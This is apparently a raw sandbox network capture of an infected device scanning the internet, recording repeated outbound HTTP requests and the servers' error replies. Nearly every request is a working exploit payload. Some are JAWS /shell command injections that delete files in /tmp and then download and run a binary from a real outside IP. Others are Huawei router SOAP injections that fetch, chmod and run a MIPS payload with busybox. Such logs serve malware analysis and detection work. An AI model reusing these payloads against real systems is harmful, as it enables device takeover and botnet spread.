                                                            Jan 26, 2024 15:33:00.622420073 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:33:00.775413990 CET306INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:33:00 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 146
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            638192.168.2.2347490211.22.125.12280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:33:00.860742092 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:33:01.139620066 CET487INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Connection: close
                                                            Date: Fri, 26 Jan 2024 14:32:59 GMT
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            639192.168.2.2341862156.224.13.5537215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:33:01.135581017 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            640192.168.2.2342302156.241.15.8637215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:33:01.150691032 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            641192.168.2.2359940156.224.12.16237215
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:33:01.456415892 CET857OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                            Content-Length: 430
                                                            Connection: keep-alive
                                                            Accept: */*
                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            642192.168.2.234784084.104.15.14880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:33:01.527807951 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:33:01.757843018 CET1286INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:33:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 3212
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=20
                                                            Vary: Accept-Encoding
                                                            ETag: "608a73a9-c8c"
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 73 74 79 6c 65 3e 2e 63 65 6e 74 65 72 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 2e 63 65 6e 74 65 72 3a 6c 61 6e 67 28 7a 68 2d 54 57 29 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 4d 69 63 72 6f 73 6f 66 74 20 4a 68 65 6e 67 48 65 69 2c 73 61 6e 73 2d 73 65 72 69 66 7d 2e 63 65 6e 74 65 72 3a 6c 61 6e 67 28 7a 68 2d 43 4e 29 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 2c 73 61 6e 73 2d 73 65 72 69 66 7d 2e 63 65 6e 74 65 72 3a 6c 61 6e 67 28 6a 61 29 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 4d 65 69 72 79 6f 2c 73 61 6e 73 2d 73 65 72 69 66 7d 2e 63 69 72 63 6c 65 5f 74 65 78 74 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 36 30 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 38 30 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 2e 74 6f 70 7b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 68 65 69 67 68 74 3a 63 61 6c 63 28 34 30 25 20 2d 20 31 34 30 70 78 29 7d 2e 62 6f 74 74 6f 6d 7b 68 65 69 67 68 74 3a 31 35 30 70 78 3b 68 65 69 67 68 74 3a 63 61 6c 63 28 36 30 25 20 2d 20 32 31 30 70 78 29 7d 2e 63 65 6e 74 65 72 7b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 63 69 72 63 6c 65 7b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 77 69 64 74 68 3a 32 36 30 70 78 3b 68 65 69 67 68 74 3a 32 36 30 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 63 30 63 36 63 63 7d 2e 63 69 72 63 6c 65 5f 74 65 78 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 74 65 78 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 63 6f 6c 6f 72 3a 23 34 31 34 62 35 35 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 5f 74 65 78 74 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 22 20 69 64 3d 22 61 22 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 0a 2f 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 32 31 20 53 79 6e 6f 6c 6f 67 79 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2a 2f 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 3b 61 2e 6f 70 65 6e
                                                            Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><style>.center{font-family:Verdana,Arial,sans-serif}.center:lang(zh-TW){font-family:Verdana,Arial,Microsoft JhengHei,sans-serif}.center:lang(zh-CN){font-family:Verdana,Arial,Microsoft YaHei,sans-serif}.center:lang(ja){font-family:Verdana,Arial,Meiryo,sans-serif}.circle_text{font-weight:700}html{height:100%}body{margin:0 auto;min-height:600px;min-width:800px;height:100%}.top{height:100px;height:calc(40% - 140px)}.bottom{height:150px;height:calc(60% - 210px)}.center{height:350px;text-align:center;vertical-align:middle}.circle{margin:auto;width:260px;height:260px;border-radius:50%;background:#c0c6cc}.circle_text{line-height:260px;font-size:100px;color:#fff}.text{line-height:40px;font-size:26px;color:#414b55}</style></head><body><div class="top"></div><div class="center"><div class="circle"><div class="circle_text">404</div></div><div><p class="text" id="a"></p></div><script>/* Copyright (c) 2021 Synology Inc. All rights reserved. */(function(){var a=new XMLHttpRequest();a.open
                                                            Jan 26, 2024 15:33:01.758044004 CET1286INData Raw: 28 22 67 65 74 22 2c 22 2f 6d 69 73 73 69 6e 67 22 2c 74 72 75 65 29 3b 61 2e 73 65 6e 64 28 29 3b 61 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 61 2e 72 65 61 64 79 53 74 61 74 65 3d 3d
                                                            Data Ascii: ("get","/missing",true);a.send();a.onreadystatechange=function(){if(a.readyState==4&&(a.status==200||a.status==304)){var c=String(a.responseText);var e=document.open("text/html","replace");e.write(c);e.close()}else{var d={en:"The page you are
                                                            Jan 26, 2024 15:33:01.758128881 CET894INData Raw: 71 75 65 20 76 6f 63 5c 75 30 30 65 61 20 65 73 74 5c 75 30 30 65 31 20 62 75 73 63 61 6e 64 6f 2e 22 2c 22 7a 68 2d 4d 4f 22 3a 22 5c 75 36 30 61 38 5c 75 36 32 34 30 5c 75 36 33 30 37 5c 75 35 62 39 61 5c 75 37 36 38 34 5c 75 39 38 30 31 5c 75
                                                            Data Ascii: que voc\u00ea est\u00e1 buscando.","zh-MO":"\u60a8\u6240\u6307\u5b9a\u7684\u9801\u9762\u4e0d\u5b58\u5728\u3002",da:"Den side, du leder efter, kunne ikke findes.",ja:"\u304a\u63a2\u3057\u306e\u30da\u30fc\u30b8\u304c\u3001\u898b\u3064\u304b\u308


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            643192.168.2.234661218.163.142.12380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:33:01.661822081 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:33:01.973761082 CET333INHTTP/1.1 400 Bad Request
                                                            Server: openresty/1.21.4.1
                                                            Date: Fri, 26 Jan 2024 14:33:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 163
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.1</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            644192.168.2.2359646211.25.120.21280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:33:01.663963079 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:33:02.021287918 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:33:01 GMT
                                                            Date: Fri, 26 Jan 2024 14:33:01 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 63 33 62 37 39 63 62 26 23 34 36 3b 31 37 30 36 32 37 39 35 38 31 26 23 34 36 3b 37 34 65 66 39 31 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;6c3b79cb&#46;1706279581&#46;74ef91d</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            645192.168.2.233901654.165.187.10080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:33:01.778861046 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:33:01.895979881 CET338INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Fri, 26 Jan 2024 14:33:01 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            646192.168.2.234789223.201.56.17780
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:33:01.783767939 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:33:01.905966043 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:33:01 GMT
                                                            Date: Fri, 26 Jan 2024 14:33:01 GMT
                                                            Connection: close
